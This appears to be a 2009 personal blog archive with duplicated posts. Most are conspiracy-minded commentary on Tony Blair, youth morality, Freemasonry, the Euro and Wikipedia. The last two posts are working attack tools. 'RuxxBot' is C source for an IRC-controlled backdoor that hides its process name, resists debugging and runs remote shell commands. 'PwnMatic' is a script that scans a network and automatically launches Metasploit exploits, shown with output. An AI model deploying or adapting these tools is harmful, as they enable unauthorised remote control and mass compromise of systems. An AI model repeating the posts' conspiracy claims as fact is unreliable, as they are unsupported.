Labels: Religion
Wandering where ever my paws take me!
Thursday, July 16, 2009
President of America, President of Europe...
and if the news is right, it could be that champion for truth, human rights, fairness, removal of oppression and activist against injustice, Mr Tony "yes man" Blair?
The man who is, or should I say was (apparently old dogs can learn new tricks) all for illegal wars, the murdering of millions of innocent people and lets not forget the murdering of fellow British citizens to back old alliances, including the British monarchy, to help expand the 'global' British imperial empire, could potentially be the president of not just the UK, but of the entire European region.
Obviously this is a move to centralise European power behind one man, or should I say, one puppet, just like they did with Obama in the US of A.
Now we have 2 puppets who are going to be seen as the rulers of pretty much half the planet, or at least they will be the face and voice for that power.
I really like this image on the left, it shows the clear picture of what is going on. If you can't see it yourself, let me help you. The hand of the cardinal is completely up Tony's bottom helping to make his lips and eyes move. Hence the reason why the royal red cloak is tightly wrapped around the 'Priminister to be's' posterior.
The man who is, or should I say was (apparently old dogs can learn new tricks) all for illegal wars, the murdering of millions of innocent people and lets not forget the murdering of fellow British citizens to back old alliances, including the British monarchy, to help expand the 'global' British imperial empire, could potentially be the president of not just the UK, but of the entire European region.Obviously this is a move to centralise European power behind one man, or should I say, one puppet, just like they did with Obama in the US of A.
Now we have 2 puppets who are going to be seen as the rulers of pretty much half the planet, or at least they will be the face and voice for that power.I really like this image on the left, it shows the clear picture of what is going on. If you can't see it yourself, let me help you. The hand of the cardinal is completely up Tony's bottom helping to make his lips and eyes move. Hence the reason why the royal red cloak is tightly wrapped around the 'Priminister to be's' posterior.
Again, that elusive right arm of the cardinal is missing, I wonder if it is making the smile happen or just erecting the finger.
"Tony Blair won the formal backing of Gordon Brown yesterday as Britain's candidate to become the first "President of Europe"."
You can read the full story here
"Tony Blair won the formal backing of Gordon Brown yesterday as Britain's candidate to become the first "President of Europe"."
You can read the full story here
Labels: Political
The sad state of the youth
This is an old post that got removed some how - Added back.
Remember the days when life was simple and things didn't matter. Now, as each second ticks by, the societies we occupy seem to overflow that little bit more with a needless desire to embrace
the foul, sesspits that material life has to offer. Our grooming and desensitization from the negative trinkets of the world is unpraralleled, some say that history repeats itself and this for sure a certainty.
We are now back to the Babylonian days where the most undesirable things became the overwhelming desire for the populus. 100 years ago, nudity, drunkeness, ludeness and the likes was frowned upon, yet here we are today. Now further advanced in our technological innovations, man seems to have advanced so far yet for some oxymoronic reason, regressed even further and with our freshly aquired ego and knowledge, we are suffering from an accute deteriaration of goodness.
The state of our children is simply a reflection of the adults and the society they develop and grow in. A child is a blank canvase and only develops and grows according to the inputs it receives from it's surroundings, this is a simple sociological fact. So we ask why are the children wanting to do drugs, drink booze, have promiscuous sex, and all these things? It is quite simple, their education, their friends, their examples and their society are all bias toward these things.
Then is it any surprise that in 2007 in the mighty US of A, over 90,427 reported rapes occurred and more than 1,408,337 violent crimes took place? These are staggering numbers for the most 'free and advanced' nation in the world. These number by the way are taken from http://www.fbi.gov and not made up :)
If you watch the TV, read a newspaper or even walk down the street today you are bombarded with images of half-nude women advertising coca-cola, men and women dressed as if they are auditioning for a porn movie, reality TV shows where misguided celebrities (who are the role models for our youth) talk about their sordid sexual relations, drink and drug binges and the likes, it is of little surprise when your little Tommy comes home stoned and Tabatha comes home pregnant.
Children simply mimic the peers they have and when the society as a whole is obsessed with football, drinking and drugs, partying and 'living it up', what else can we expect to happen to them, they will simply do the same. The ironic fact is that the majority of people don't really care about this problem until it hits home, and when it does they blame the junkies, the prostitutes and the governments lack of involvement for their childs impoverished state. The reality is, however, that it is none of these things that have caused the problem, it is simply a case misguided education.
An example of this is many of the young guys I know. I asked some of them if sleeping around with girls was something that should be abandoned and replaced with a 'marriage first' institution like in Islam and Christianity, etc. The overwhelming response was 'um, no', sleeping around was fun and cool and religion had no practicle implementation.
I then asked the same people what they would think if their daughter was the target of guys thinking how you were today, seeing her as a piece of meat to sleep with for one night and then forget about. The honest ones were outraged at this suggestion and for some reason stated that sleeping around was no longer ok in this situation.... Double standards?
It is wierd how things change when, as I said, when it comes home.
Education starts with and ends with the parents, and if they are misguided then I ask what hope is there?
"Children as young as 12 are being treated in a new specialist addiction unit set up to deal with those hooked on alcohol and drugs.
The Priory hospital, which is famous for its celebrity patients, set up the unit to meet what it says is mounting demand from worried parents. The unit, based at its acute psychiatric hospital in north London, will deal with drug and alcohol problems, eating disorders and behavioural issues such as an obsession with the internet or computer games."
http://news.independent.co.uk/uk/health_medical/article2578491.ece
Remember the days when life was simple and things didn't matter. Now, as each second ticks by, the societies we occupy seem to overflow that little bit more with a needless desire to embrace
the foul, sesspits that material life has to offer. Our grooming and desensitization from the negative trinkets of the world is unpraralleled, some say that history repeats itself and this for sure a certainty.We are now back to the Babylonian days where the most undesirable things became the overwhelming desire for the populus. 100 years ago, nudity, drunkeness, ludeness and the likes was frowned upon, yet here we are today. Now further advanced in our technological innovations, man seems to have advanced so far yet for some oxymoronic reason, regressed even further and with our freshly aquired ego and knowledge, we are suffering from an accute deteriaration of goodness.
The state of our children is simply a reflection of the adults and the society they develop and grow in. A child is a blank canvase and only develops and grows according to the inputs it receives from it's surroundings, this is a simple sociological fact. So we ask why are the children wanting to do drugs, drink booze, have promiscuous sex, and all these things? It is quite simple, their education, their friends, their examples and their society are all bias toward these things.
Then is it any surprise that in 2007 in the mighty US of A, over 90,427 reported rapes occurred and more than 1,408,337 violent crimes took place? These are staggering numbers for the most 'free and advanced' nation in the world. These number by the way are taken from http://www.fbi.gov and not made up :)
If you watch the TV, read a newspaper or even walk down the street today you are bombarded with images of half-nude women advertising coca-cola, men and women dressed as if they are auditioning for a porn movie, reality TV shows where misguided celebrities (who are the role models for our youth) talk about their sordid sexual relations, drink and drug binges and the likes, it is of little surprise when your little Tommy comes home stoned and Tabatha comes home pregnant.
Children simply mimic the peers they have and when the society as a whole is obsessed with football, drinking and drugs, partying and 'living it up', what else can we expect to happen to them, they will simply do the same. The ironic fact is that the majority of people don't really care about this problem until it hits home, and when it does they blame the junkies, the prostitutes and the governments lack of involvement for their childs impoverished state. The reality is, however, that it is none of these things that have caused the problem, it is simply a case misguided education.
An example of this is many of the young guys I know. I asked some of them if sleeping around with girls was something that should be abandoned and replaced with a 'marriage first' institution like in Islam and Christianity, etc. The overwhelming response was 'um, no', sleeping around was fun and cool and religion had no practicle implementation.
I then asked the same people what they would think if their daughter was the target of guys thinking how you were today, seeing her as a piece of meat to sleep with for one night and then forget about. The honest ones were outraged at this suggestion and for some reason stated that sleeping around was no longer ok in this situation.... Double standards?
It is wierd how things change when, as I said, when it comes home.
Education starts with and ends with the parents, and if they are misguided then I ask what hope is there?
"Children as young as 12 are being treated in a new specialist addiction unit set up to deal with those hooked on alcohol and drugs.
The Priory hospital, which is famous for its celebrity patients, set up the unit to meet what it says is mounting demand from worried parents. The unit, based at its acute psychiatric hospital in north London, will deal with drug and alcohol problems, eating disorders and behavioural issues such as an obsession with the internet or computer games."
http://news.independent.co.uk/uk/health_medical/article2578491.ece
Labels: Random
Forbidden fruit....
This is an old post that got deleted some how - Added back.
...the forbidden knowledge?
"All truth passes through three stages. First, it is ridiculed, second it is violently opposed, and third, it is accepted as self-evident." - Arthur Schopenhauer
A pretty cool site, enjoy!
http://www.theforbiddenknowledge.com
"In 1990 I started studying UFOs. I came home from work one evening, turned on the Television like most other people do and airing on the FOX Network was a show called, "Sightings". It was a show dedicated to the unexplained. It often showed UFO footaqe from around the world. The footage they were playing that night was very convincing to me so I decided to look into the subject further. As time went by I expande my research to the Bible and ancient civilizations. I had no idea where this research would lead me.
A couple years went by and in those I managed to collect an impressive store of UFO video footage from television. I would listen to UFO "experts"
such as Stanton Freedman talk about the U.S. Governments involvement in the secrecy of UFOs. As time went on I realized that individuals like Stanton were part of an evil scheme. I listened to Art Bell late at night every night gathering as much information as I could. But even with Art Bell I grew suspicious.
A friend of mine gave me a copy of Bramley's book and I began to read it. As my level of awareness rose I realized secret societies and how they worked. As time went on it all became much clearer to me. I also realized that people are not always what they seem.
When my level of awareness rose to a certain point I had to write about it. I'm not the type of person to sit on something so awesome. I had to tell others of the things I was realizing. In learning you will teach, and in teaching you will learn. So I am doing just that.
Bramley mentions the conflict in the Bible between "God" and the Serpent. "God" was trying to keep a certain type of knowledge away from Mankind and the Serpent was trying to teach Mankind that knowledge. The victor of that conflict would be the ones (yes plural!) who controlled earth.
In Eden the members of "God" made it a sin to eat of the fruit. The fruit is an apple and it is symbolic for a certain kind of knowledge. To help keep Man away from that knowledge they taught that if Man learned it he would die.
Asking the question, "Why should learning knowledge be a sin?" (the original sin) and comparing it to modern day observations ought to wake you up to the fact that you live within societal system that was engineered by the members of "God" to empower themselves while keeping those who live within it ignorant. Do you want to test this theory?
Write down on a piece of paper all the things that you own. Next, for each item ask yourself, "Did I design and manufacture this item?" A majority of things within your home you purchased and have no knowledge of how they were designed or built. "The Custodians [God] clearly did not want mankind to begin traveling the road to spiritual recovery." PP 48. One sure way is to keep knowledge away from the human race. The information they do not want you to learn however is not of the technological kind, it is The Forbidden Knowledge. Methods used to control an entire world and to keep the personalities who live in that world spiritually ignorant and unaware of the prison system they are caught in. Did you learn anything about Freemasonry's dominate presence on earth in grade school?
The bible says Satan is a destroyer, it also says in II Corinthians 4 that he controls earth. This should be of no surprise to you with what you just learned because it coincides with modern day observations.
The social system you live within lies to you. It conditions your mind to think that you are the most advanced human earth has ever seen when in fact, the reverse is true. You are dependant on it for all your basic needs. Everything is already prepare for you. Your clothes come from department stores, your food comes from grocery stores, and your home was most likely not designed and built by you either. Do you think that is progress? The bottom line is, you can use technology but you cannot design and build your own unless you have a lot of money and who controls the money? Freemasonry.
The Custodial-designed societal system includes an education sub system that produces robots, people who all think the same way and an employment sub system which furthers that robotic behavior. This makes it easier for them to control the people because a robot never questions authority and does what everyone else does. Bramley's book reveals that Satan traded places with God in Eden and fooled the human race. Modern day observations prove this."
http://www.theforbiddenknowledge.com/godsofeden/index.htm
...the forbidden knowledge?
"All truth passes through three stages. First, it is ridiculed, second it is violently opposed, and third, it is accepted as self-evident." - Arthur Schopenhauer
A pretty cool site, enjoy!
http://www.theforbiddenknowledge.com
"In 1990 I started studying UFOs. I came home from work one evening, turned on the Television like most other people do and airing on the FOX Network was a show called, "Sightings". It was a show dedicated to the unexplained. It often showed UFO footaqe from around the world. The footage they were playing that night was very convincing to me so I decided to look into the subject further. As time went by I expande my research to the Bible and ancient civilizations. I had no idea where this research would lead me.
A couple years went by and in those I managed to collect an impressive store of UFO video footage from television. I would listen to UFO "experts"
such as Stanton Freedman talk about the U.S. Governments involvement in the secrecy of UFOs. As time went on I realized that individuals like Stanton were part of an evil scheme. I listened to Art Bell late at night every night gathering as much information as I could. But even with Art Bell I grew suspicious.A friend of mine gave me a copy of Bramley's book and I began to read it. As my level of awareness rose I realized secret societies and how they worked. As time went on it all became much clearer to me. I also realized that people are not always what they seem.
When my level of awareness rose to a certain point I had to write about it. I'm not the type of person to sit on something so awesome. I had to tell others of the things I was realizing. In learning you will teach, and in teaching you will learn. So I am doing just that.
Bramley mentions the conflict in the Bible between "God" and the Serpent. "God" was trying to keep a certain type of knowledge away from Mankind and the Serpent was trying to teach Mankind that knowledge. The victor of that conflict would be the ones (yes plural!) who controlled earth.
In Eden the members of "God" made it a sin to eat of the fruit. The fruit is an apple and it is symbolic for a certain kind of knowledge. To help keep Man away from that knowledge they taught that if Man learned it he would die.
Asking the question, "Why should learning knowledge be a sin?" (the original sin) and comparing it to modern day observations ought to wake you up to the fact that you live within societal system that was engineered by the members of "God" to empower themselves while keeping those who live within it ignorant. Do you want to test this theory?
Write down on a piece of paper all the things that you own. Next, for each item ask yourself, "Did I design and manufacture this item?" A majority of things within your home you purchased and have no knowledge of how they were designed or built. "The Custodians [God] clearly did not want mankind to begin traveling the road to spiritual recovery." PP 48. One sure way is to keep knowledge away from the human race. The information they do not want you to learn however is not of the technological kind, it is The Forbidden Knowledge. Methods used to control an entire world and to keep the personalities who live in that world spiritually ignorant and unaware of the prison system they are caught in. Did you learn anything about Freemasonry's dominate presence on earth in grade school?
The bible says Satan is a destroyer, it also says in II Corinthians 4 that he controls earth. This should be of no surprise to you with what you just learned because it coincides with modern day observations.
The social system you live within lies to you. It conditions your mind to think that you are the most advanced human earth has ever seen when in fact, the reverse is true. You are dependant on it for all your basic needs. Everything is already prepare for you. Your clothes come from department stores, your food comes from grocery stores, and your home was most likely not designed and built by you either. Do you think that is progress? The bottom line is, you can use technology but you cannot design and build your own unless you have a lot of money and who controls the money? Freemasonry.
The Custodial-designed societal system includes an education sub system that produces robots, people who all think the same way and an employment sub system which furthers that robotic behavior. This makes it easier for them to control the people because a robot never questions authority and does what everyone else does. Bramley's book reveals that Satan traded places with God in Eden and fooled the human race. Modern day observations prove this."
http://www.theforbiddenknowledge.com/godsofeden/index.htm
Labels: Religion
Switcheroo
This is an old post that got removed some how - Added back.
I love media propaganda, it is really cool. A fast, cost effective way to use suggestive techniques to massage and manipulate the society it serves by implanting ideas, feelings, emotions and realities in to peoples mind.
The worst part though is that this happens WITHOUT any form of resistance! Since the victim is self inducing themselves by willingly buying and reading the newspapers, magazines, TV licenses, etc.... Very clever.
What is cooler though, is being able to see it for what it is. And thank God I am able to understand what is going on. :)
Anyway, I saw this report on the independent, which is a reasonable paper in the UK, not great but it's ok. Anyway, today it is discussing another pop start insisting on being paid in Euros
http://news.independent.co.uk/world/americas/article3169653.ece
apposed to ever declining Dollars. This might seem trivial at first glance, but coupled with the media coverage last month of a model who asked the same, it is clear the media (foreign and domestic) want to push the thought that the Euro is the new cool item.
http://youtube.com/watch?v=wiuNd5SoU8E
jay-Z used to drop some decent tunes, but obviously not anymore as you see from that video, but you certainly see Euros as his "bread" numerous times. Maybe a wild coincidence....
"Look all the famous, cool people in the world are using it, shouldn't you, don't you want to be cool too?!" is what the media is shouting out!!
So, this goes back to the discussion about a One World Government and a One World Currency
Check out: http://video.google.co.uk/videoplay?docid=-448659287463550973
The Dollar isn't here to stay, I think that is clear - but will a second push for the Pound Sterling and UK to adopt the Euro again by "British Government" happen too? Interesting.
I love media propaganda, it is really cool. A fast, cost effective way to use suggestive techniques to massage and manipulate the society it serves by implanting ideas, feelings, emotions and realities in to peoples mind.
The worst part though is that this happens WITHOUT any form of resistance! Since the victim is self inducing themselves by willingly buying and reading the newspapers, magazines, TV licenses, etc.... Very clever.
What is cooler though, is being able to see it for what it is. And thank God I am able to understand what is going on. :)
Anyway, I saw this report on the independent, which is a reasonable paper in the UK, not great but it's ok. Anyway, today it is discussing another pop start insisting on being paid in Euros
http://news.independent.co.uk/world/americas/article3169653.ece
apposed to ever declining Dollars. This might seem trivial at first glance, but coupled with the media coverage last month of a model who asked the same, it is clear the media (foreign and domestic) want to push the thought that the Euro is the new cool item.
http://youtube.com/watch?v=wiuNd5SoU8E
jay-Z used to drop some decent tunes, but obviously not anymore as you see from that video, but you certainly see Euros as his "bread" numerous times. Maybe a wild coincidence....
"Look all the famous, cool people in the world are using it, shouldn't you, don't you want to be cool too?!" is what the media is shouting out!!
So, this goes back to the discussion about a One World Government and a One World Currency
Check out: http://video.google.co.uk/videoplay?docid=-448659287463550973
The Dollar isn't here to stay, I think that is clear - but will a second push for the Pound Sterling and UK to adopt the Euro again by "British Government" happen too? Interesting.
Labels: Random
Thursday, July 09, 2009
Wikidpedia
I do not like Wikipedia, it's information in many cases is extremely bias and inaccurate, they are unwilling to promote facts yet unfortunatly, they are seen as the most authoritive figure in inter-fact.
If you don't believe me, google for things like "wikipedia inaccuracies", "wikipedia biased", "wikipedia inaccurate" or any other likely keywords and wake up!
Just who is editing and managing wiki articles?
"if Wikipedia is "history", then history is indeed bunk" - Petronella Wayte.
Rather than Wikidpedia, I rather this cool site which seems to promote a more accurate version of current information and historical record based on fact. Better job.
http://www.conservapedia.com/Main_Page
If you don't believe me, google for things like "wikipedia inaccuracies", "wikipedia biased", "wikipedia inaccurate" or any other likely keywords and wake up!
Just who is editing and managing wiki articles?
"if Wikipedia is "history", then history is indeed bunk" - Petronella Wayte.
Rather than Wikidpedia, I rather this cool site which seems to promote a more accurate version of current information and historical record based on fact. Better job.
http://www.conservapedia.com/Main_Page
Labels: Random
Tuesday, June 30, 2009
Obama - What is the truth??
Webster Tarpley has released a new book called "Obama, The Unauthorised Biography".
If you do not know who Webster Tarpley is, here is a link to his site: http://www.tarpley.net
#### Part One
#### Part Two
Anyway, after all that, now the last video - this is an interesting view, please enjoy it and leave a comment :)
If you do not know who Webster Tarpley is, here is a link to his site: http://www.tarpley.net
#### Part One
#### Part Two
Anyway, after all that, now the last video - this is an interesting view, please enjoy it and leave a comment :)
Friday, June 19, 2009
RuxxBot
/*
* An SSL IRC bot that will run some commands on teh hoster, useful for running
* john on your linux box via irc during a pentest - cheap man's VPN ;)
*
* Has a couple of little bugs which I might fix, but it serves it's simple purpose.
*
* You should change the stuff in SSLTYPE1 & SSLTYPE2 to match your own box, I
* just added that as a test to see if it would tell if a MITM was present.
*
*/
#include < stdio.h > // You will have to fix these spaces, blogspot's fault.
#include < string.h >
#include < unistd.h >
#include < arpa/inet.h >
#include < sys/ptrace.h >
#include < sys/socket.h >
#include < sys/types.h >
#include < resolv.h >
#include < netdb.h >
#include < openssl/ssl.h >
#include < openssl/err.h >
#define OWNER "x0ng@i.r.steppin.down"
#define NICK "ruxxbot"
#define USER "ruxxbot"
#define CHAN "home"
#define SERV "nodefense.org"
#define PASS "" //channel password
#define PORT 65531
#define LABEL "t3hrUxx0r"
#define SSLTYPE1 "AES256-SHA"
#define SSLTYPE2 "TLSv1i/SSLv3"
#define BSIZE 80
SSL_CTX*
initctx(void)
{
SSL_METHOD *method;
SSL_CTX *ctx;
SSL_library_init();
OpenSSL_add_all_algorithms();
method = SSLv23_client_method();
ctx = SSL_CTX_new(method);
return ctx;
}
void
srvsend(SSL *ssl, char *msg)
{
if(SSL_write(ssl, msg, strlen(msg)) < 1)
exit(1);
}
char *
srvread(SSL *ssl)
{
int bytes;
char buf[4096] = {0};
char * msgbuf = (char *)malloc(BSIZE);
char * ret = NULL;
bytes = SSL_read(ssl, buf, sizeof(buf)-1);
if(!bytes)
exit(1);
if((strlen(buf) > 2047) || strlen(buf) < 1)
exit(1);
buf[2047] = '\0';
if(strstr(buf, "PING")) {
sleep(2);
memset(msgbuf, 0, BSIZE);
snprintf(msgbuf, strlen(SERV) + 8, "PONG :%s\r\n", SERV);
srvsend(ssl, msgbuf);
}
free(msgbuf);
msgbuf = NULL;
ret = buf;
return ret;
}
void
runcmd(SSL *ssl, char * cmdptr)
{
char buf[256] = {0};
char * cmdbuf = (char *)malloc(2048);
char * lol = NULL;
FILE * sys = NULL;
memset(cmdbuf, 0, 2048);
if((strlen(cmdptr) > 256) || (strlen(cmdptr) < 1))
return;
lol = strchr(cmdptr, '!e ');
if(!lol)
return;
lol[strlen(lol)-2] = '\0';
sys = popen(lol, "r");
if(!sys)
return;
while(fgets(buf, sizeof(buf)-1, sys)) {
snprintf(cmdbuf, strlen(buf) + strlen(OWNER) + 11, "PRIVMSG #%s %s\n", CHAN, buf);
srvsend(ssl, cmdbuf);
}
free(cmdbuf);
cmdbuf = NULL;
pclose(sys);
}
void
op(SSL *ssl)
{
char * opbuf = (char *)malloc(BSIZE);
snprintf(opbuf, strlen(CHAN) + 15, "MODE #%s +o x0ng\n", CHAN);
srvsend(ssl, opbuf);
free(opbuf);
opbuf = NULL;
}
void
srvconn(SSL *ssl)
{
char * cmd = NULL;
char * cmdptr = NULL;
char * msgbuf = (char *)malloc(BSIZE);
struct set
{
char * chan;
char * pass;
char * user;
char * nick;
} irc;
irc.chan = CHAN;
irc.user = USER;
irc.nick = NICK;
irc.pass = PASS;
if(strlen(irc.chan) > 15 && strlen(irc.pass) > 15 && strlen(irc.user) > 15 && strlen(irc.nick) > 15)
exit(1);
memset(msgbuf, 0, BSIZE);
snprintf(msgbuf, strlen(irc.nick)+7, "NICK %s\r\n", irc.nick);
srvsend(ssl, msgbuf);
memset(msgbuf, 0, BSIZE);
snprintf(msgbuf, strlen(irc.user) + strlen(irc.user) + strlen(irc.user) + strlen(irc.user) + 11, "USER %s %s %s :%s\r\n", irc.user, irc.user, irc.user, irc.user);
srvsend(ssl, msgbuf);
memset(msgbuf, 0, BSIZE);
snprintf(msgbuf, strlen(irc.chan) + strlen(irc.pass) + 9, "JOIN #%s %s\r\n", irc.chan, irc.pass);
srvsend(ssl, msgbuf);
for(;;) {
cmd = srvread(ssl);
//printf("\n%s\n", cmd); // Debug
if((cmdptr = strstr(cmd, OWNER))) {
if((cmdptr = strstr(cmd,"!op"))) {
op(ssl);
}
if((cmdptr = strstr(cmd,"!e"))) {
runcmd(ssl, cmdptr);
}
}
}
free(msgbuf);
msgbuf = NULL;
}
int
srvssl(SSL *ssl)
{
if((!strstr(SSL_get_cipher_name(ssl), "AES256-SHA")) || (!strstr(SSL_get_cipher_version(ssl), "TLSv1i/SSLv3")))
return -1;
return 1;
}
int
main(int argc, char * argv[])
{
if (ptrace(PTRACE_TRACEME, 0, 0, 0) == -1)
exit(1);
int conx, sock, port = PORT;
struct sockaddr_in sout;
struct hostent *he;
SSL_CTX *ctx;
SSL *ssl;
pid_t pid;
strcpy(argv[0], LABEL);
he = gethostbyname(SERV);
bzero((char *)&sout, sizeof(sout));
sout.sin_family = AF_INET;
sout.sin_port = htons(port);
memcpy(&sout.sin_addr.s_addr, he->h_addr, he->h_length);
sock = socket(AF_INET, SOCK_STREAM, 0);
ctx = initctx();
ssl = SSL_new(ctx);
pid = fork();
if(pid == 0) {
conx = connect(sock, (struct sockaddr *)&sout, sizeof(sout));
SSL_set_fd(ssl, sock);
SSL_connect(ssl);
if(srvssl(ssl))
srvconn(ssl);
}
close(sock);
SSL_free(ssl);
SSL_CTX_free(ctx);
return 0;
}
* An SSL IRC bot that will run some commands on teh hoster, useful for running
* john on your linux box via irc during a pentest - cheap man's VPN ;)
*
* Has a couple of little bugs which I might fix, but it serves it's simple purpose.
*
* You should change the stuff in SSLTYPE1 & SSLTYPE2 to match your own box, I
* just added that as a test to see if it would tell if a MITM was present.
*
*/
#include < stdio.h > // You will have to fix these spaces, blogspot's fault.
#include < string.h >
#include < unistd.h >
#include < arpa/inet.h >
#include < sys/ptrace.h >
#include < sys/socket.h >
#include < sys/types.h >
#include < resolv.h >
#include < netdb.h >
#include < openssl/ssl.h >
#include < openssl/err.h >
#define OWNER "x0ng@i.r.steppin.down"
#define NICK "ruxxbot"
#define USER "ruxxbot"
#define CHAN "home"
#define SERV "nodefense.org"
#define PASS "" //channel password
#define PORT 65531
#define LABEL "t3hrUxx0r"
#define SSLTYPE1 "AES256-SHA"
#define SSLTYPE2 "TLSv1i/SSLv3"
#define BSIZE 80
SSL_CTX*
initctx(void)
{
SSL_METHOD *method;
SSL_CTX *ctx;
SSL_library_init();
OpenSSL_add_all_algorithms();
method = SSLv23_client_method();
ctx = SSL_CTX_new(method);
return ctx;
}
void
srvsend(SSL *ssl, char *msg)
{
if(SSL_write(ssl, msg, strlen(msg)) < 1)
exit(1);
}
char *
srvread(SSL *ssl)
{
int bytes;
char buf[4096] = {0};
char * msgbuf = (char *)malloc(BSIZE);
char * ret = NULL;
bytes = SSL_read(ssl, buf, sizeof(buf)-1);
if(!bytes)
exit(1);
if((strlen(buf) > 2047) || strlen(buf) < 1)
exit(1);
buf[2047] = '\0';
if(strstr(buf, "PING")) {
sleep(2);
memset(msgbuf, 0, BSIZE);
snprintf(msgbuf, strlen(SERV) + 8, "PONG :%s\r\n", SERV);
srvsend(ssl, msgbuf);
}
free(msgbuf);
msgbuf = NULL;
ret = buf;
return ret;
}
void
runcmd(SSL *ssl, char * cmdptr)
{
char buf[256] = {0};
char * cmdbuf = (char *)malloc(2048);
char * lol = NULL;
FILE * sys = NULL;
memset(cmdbuf, 0, 2048);
if((strlen(cmdptr) > 256) || (strlen(cmdptr) < 1))
return;
lol = strchr(cmdptr, '!e ');
if(!lol)
return;
lol[strlen(lol)-2] = '\0';
sys = popen(lol, "r");
if(!sys)
return;
while(fgets(buf, sizeof(buf)-1, sys)) {
snprintf(cmdbuf, strlen(buf) + strlen(OWNER) + 11, "PRIVMSG #%s %s\n", CHAN, buf);
srvsend(ssl, cmdbuf);
}
free(cmdbuf);
cmdbuf = NULL;
pclose(sys);
}
void
op(SSL *ssl)
{
char * opbuf = (char *)malloc(BSIZE);
snprintf(opbuf, strlen(CHAN) + 15, "MODE #%s +o x0ng\n", CHAN);
srvsend(ssl, opbuf);
free(opbuf);
opbuf = NULL;
}
void
srvconn(SSL *ssl)
{
char * cmd = NULL;
char * cmdptr = NULL;
char * msgbuf = (char *)malloc(BSIZE);
struct set
{
char * chan;
char * pass;
char * user;
char * nick;
} irc;
irc.chan = CHAN;
irc.user = USER;
irc.nick = NICK;
irc.pass = PASS;
if(strlen(irc.chan) > 15 && strlen(irc.pass) > 15 && strlen(irc.user) > 15 && strlen(irc.nick) > 15)
exit(1);
memset(msgbuf, 0, BSIZE);
snprintf(msgbuf, strlen(irc.nick)+7, "NICK %s\r\n", irc.nick);
srvsend(ssl, msgbuf);
memset(msgbuf, 0, BSIZE);
snprintf(msgbuf, strlen(irc.user) + strlen(irc.user) + strlen(irc.user) + strlen(irc.user) + 11, "USER %s %s %s :%s\r\n", irc.user, irc.user, irc.user, irc.user);
srvsend(ssl, msgbuf);
memset(msgbuf, 0, BSIZE);
snprintf(msgbuf, strlen(irc.chan) + strlen(irc.pass) + 9, "JOIN #%s %s\r\n", irc.chan, irc.pass);
srvsend(ssl, msgbuf);
for(;;) {
cmd = srvread(ssl);
//printf("\n%s\n", cmd); // Debug
if((cmdptr = strstr(cmd, OWNER))) {
if((cmdptr = strstr(cmd,"!op"))) {
op(ssl);
}
if((cmdptr = strstr(cmd,"!e"))) {
runcmd(ssl, cmdptr);
}
}
}
free(msgbuf);
msgbuf = NULL;
}
int
srvssl(SSL *ssl)
{
if((!strstr(SSL_get_cipher_name(ssl), "AES256-SHA")) || (!strstr(SSL_get_cipher_version(ssl), "TLSv1i/SSLv3")))
return -1;
return 1;
}
int
main(int argc, char * argv[])
{
if (ptrace(PTRACE_TRACEME, 0, 0, 0) == -1)
exit(1);
int conx, sock, port = PORT;
struct sockaddr_in sout;
struct hostent *he;
SSL_CTX *ctx;
SSL *ssl;
pid_t pid;
strcpy(argv[0], LABEL);
he = gethostbyname(SERV);
bzero((char *)&sout, sizeof(sout));
sout.sin_family = AF_INET;
sout.sin_port = htons(port);
memcpy(&sout.sin_addr.s_addr, he->h_addr, he->h_length);
sock = socket(AF_INET, SOCK_STREAM, 0);
ctx = initctx();
ssl = SSL_new(ctx);
pid = fork();
if(pid == 0) {
conx = connect(sock, (struct sockaddr *)&sout, sizeof(sout));
SSL_set_fd(ssl, sock);
SSL_connect(ssl);
if(srvssl(ssl))
srvconn(ssl);
}
close(sock);
SSL_free(ssl);
SSL_CTX_free(ctx);
return 0;
}
Labels: Security
AutoSploit PwnMatic
This script will run nmap against a a box/network to find live boxes then scan it with nessus, importing the results to metasploit and then running autopwn against the vulnerabilities found which are targeted by the vulnID - it seems more efficient than running every exploit against every open port, al la the default autopwn method. It also saves owning the same breed of bug several times.
Just run it, go for a coffee and come back to get your r00t on :)
##
# Autopwn pwnmatic
##
#!/bin/sh
NESSUS=~/pentest/scanners/nessus/bin/ #nessus binary
MSF=~/pentest/exploiting/metasploit #msf console location
LOG=~/audits/scans/nessus/$2.nbe #report location
HOSTS=./nessus_hosts.txt
AUTOPWN=./autopwn
echo "Starting scan..."
nmap -v -n -sP $1 |grep Host | grep up | awk '{print $2}' > $HOSTS
echo "Scan finished, starting nessus..."
$NESSUS/nessus localhost 1337 user p4ssw0rd $HOSTS $LOG
echo "Nessus finished, converting log..."
$NESSUS/nessus -i $LOG -o $LOG.txt
$NESSUS/nessus -i $LOG -o $LOG.nessus
mv $HOSTS ~/audits/scans/nmap/$2-nmap_auto.txt
echo "Do you want to import into metasploit autopwn? (y/n)"
read DOU
if [ $DOU == "y" ] ; then
cat > $AUTOPWN << _EOF
db_create $2.db
db_import_nessus_nbe $LOG
db_autopwn -x -r -e
_EOF
echo "please wait..."
$MSF/msfconsole -r $AUTOPWN
else
echo "Listing any fulnerabilities then..."
A=`egrep "Security hole found" $LOG.txt | sort -u`
if [ $A -eq "" ] ; then
echo " --> None found :("
else
echo $A
fi
echo "Finished."
fi
##
# End
###
user@debauch:~/scripts$ ./pwnmatic.sh 192.168.224.0/24 test-run
Starting scan...
Scan finished, starting nessus...
Nessus finished, converting log...
Do you want to import into metasploit autopwn? (y/n)
y
please wait...
o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
=[ msf v3.3-dev
+ -- --=[ 379 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 158 aux
resource> db_create testing.db
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: testing.db
resource> db_import_nessus_nbe /home/user/audits/scans/nessus/testing.nbe
resource> db_autopwn -x -r -e
[*] (1/4): Launching exploit/windows/smb/ms04_011_lsass against 192.168.224.131:445...
[*] (2/4): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.224.131:135...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] (4/4): Launching exploit/windows/smb/ms06_040_netapi against 192.168.224.131:445...
[*] Handler binding to LHOST 0.0.0.0
